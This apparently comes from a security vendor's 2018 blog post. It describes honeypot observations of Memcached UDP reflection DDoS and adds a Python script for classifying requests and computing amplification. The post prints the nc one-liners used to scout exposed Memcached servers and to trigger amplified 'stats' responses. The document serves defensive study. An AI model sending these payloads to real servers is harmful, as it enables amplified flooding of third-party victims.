June 4, 2018
As DDoS-for-hire services will surely become cheaper, protecting your network resources from future attacks is not optional.
The recent crackdown on the DDoS-for-hire website WebStresser is commendable, but it is just the tip of the iceberg. The site had more than 136,000 registered users, which shows that demand for DDoS attacks from business rivals, haters and former employees is huge, and that they are willing to pay for it.
If history is any guide, other dark web service sites will quickly fill the void. What’s more, the cost of such DDoS-for-hire services will continue to fall as new vulnerabilities and techniques let attackers generate junk traffic more cost-effectively.
One powerful, highly cost-effective attack vector discovered recently is the Memcached servers deployed by high-traffic websites, infrastructure and DNS providers. By sending a simple UDP request from a spoofed IP address, an attacker can reflect massively amplified traffic off unprotected Memcached servers onto the victim.
To demystify Memcached-powered DDoS attacks, our research team set up a honeypot disguised as an open Memcached server. It allows us to understand the attackers’ techniques, trace the botnets behind them and identify the victims.
Our honeypot records reveal a two-step approach: attackers first identify unsecured Memcached servers they can abuse, then reflect oversized packets off those servers to the designated victims.
Step 1: Scout for abusable Memcached servers
In the scanning phase, attackers first send a “version” or “gets” request to the IP addresses of Memcached servers to identify reachable and abusable machines.
Because the response to either of these requests is marginally smaller than the request itself, the reply does not flood the sender, i.e. the attacker, with traffic.
“version” request
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00version\r\n" | nc -q1 -u xxx.xxx.xxx.xxx 11211
“gets” request
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00gets a b c d e f g h j k l m n o p q r s t w v u x y a \
Step 2: Attack in action
Once an abusable Memcached server has been identified, a “stats” request is sent to it from a spoofed source IP address, so that the server reflects its much larger response packets to the victim.
xxxx@xxxxxxxxxx:~# echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u xxx.xxx.xxx.xxx 11211
STAT pid 9302
STAT uptime 1316
STAT time 1524625314
STAT version 1.4.13
STAT libevent 2.0.19-stable
STAT pointer_size 64
STAT rusage_user 2.508156
STAT rusage_system 1.420088
STAT curr_connections 8
. . . .
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT evictions 0
STAT reclaimed 0
END
In a series of attacks observed through the honeypot, a 15-byte request was answered by a 1,052-byte response, more than 70 times the size of the original request.
Given today’s attackers’ ability to mobilize large botnets, the magnitude of Memcached-based attacks could easily exceed the terabit threshold.
From the Mirai code and insecure IoT devices to vulnerable Memcached servers, it is clear that cybercriminals not only seek to expand the DDoS botnets at their command, but are also on the lookout for new weapons that increase attack efficiency and lower cost.
Very soon, attacks launched by DDoS-for-hire services will be bigger and more effective, yet cheaper and more accessible to amateurs and unskilled attackers. Without proper protection, your online presence and business reputation are at stake.
Note: Stay tuned for our Q1 Threat Report, in which the honeypot results will be detailed.
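As an added example that is not part of the original post or of the honeypot described here, the following Python parses the 8-byte Memcached UDP frame header and command line from requests like those shown above, sorts them into the scout and reflect steps, and computes the amplification ratio the honeypot figures refer to. The sample IP addresses and the stats response are constructed stand-ins.

```python
import struct

# Memcached UDP frame header: request id, sequence number, total datagrams,
# reserved; four big-endian 16-bit fields ahead of the ASCII command line.
UDP_HEADER = struct.Struct(">HHHH")
SCOUT_COMMANDS = {"version", "gets", "get"}   # step 1: answer is tiny, sender can afford it
REFLECT_COMMANDS = {"stats"}                   # step 2: answer is large, aimed at a spoofed source

def parse_memcached_udp(datagram: bytes) -> dict:
    """Split a Memcached UDP datagram into its 8-byte header and text command."""
    if len(datagram) < UDP_HEADER.size:
        raise ValueError("datagram shorter than the 8-byte UDP frame header")
    req_id, seq, total, _reserved = UDP_HEADER.unpack_from(datagram)
    line = datagram[UDP_HEADER.size:].partition(b"\r\n")[0]  # one command per line
    tokens = line.decode("ascii", errors="replace").split()
    return {"request_id": req_id, "sequence": seq, "datagrams": total,
            "command": tokens[0].lower() if tokens else "", "args": tokens[1:]}

def classify(datagram: bytes) -> str:
    """Map a request onto the two-step pattern: 'scout', 'reflect' or 'other'."""
    cmd = parse_memcached_udp(datagram)["command"]
    if cmd in REFLECT_COMMANDS:
        return "reflect"
    return "scout" if cmd in SCOUT_COMMANDS else "other"

def amplification_factor(request: bytes, response: bytes) -> float:
    """Response bytes per request byte, the ratio quoted for the honeypot captures."""
    return len(response) / len(request)

def triage(events):
    """Label (source_ip, datagram) pairs as a honeypot analyst would: scout traffic
    carries the attacker's real address (it needs the answer), reflect traffic
    carries the victim's spoofed address."""
    roles = {"scout": "scanner", "reflect": "likely victim (spoofed source)", "other": "unknown"}
    return [{"src": ip, "command": parse_memcached_udp(d)["command"], "role": roles[classify(d)]}
            for ip, d in events]

# Constructed sample traffic. The requests reuse the header/command bytes shown above;
# the stats response is a constructed stand-in of similar shape, not captured output.
HDR = b"\x00\x00\x00\x00\x00\x01\x00\x00"
VERSION_REQ = HDR + b"version\r\n"
STATS_REQ = HDR + b"stats\r\n"  # 15 bytes, matching the honeypot figure
SAMPLE_STATS_RESP = HDR + b"".join(b"STAT item%d %d\r\n" % (i, i) for i in range(60)) + b"END\r\n"

if __name__ == "__main__":
    for row in triage([("198.51.100.7", VERSION_REQ), ("203.0.113.9", STATS_REQ)]):
        print(row)
    print("amplification x%.1f" % amplification_factor(STATS_REQ, SAMPLE_STATS_RESP))
```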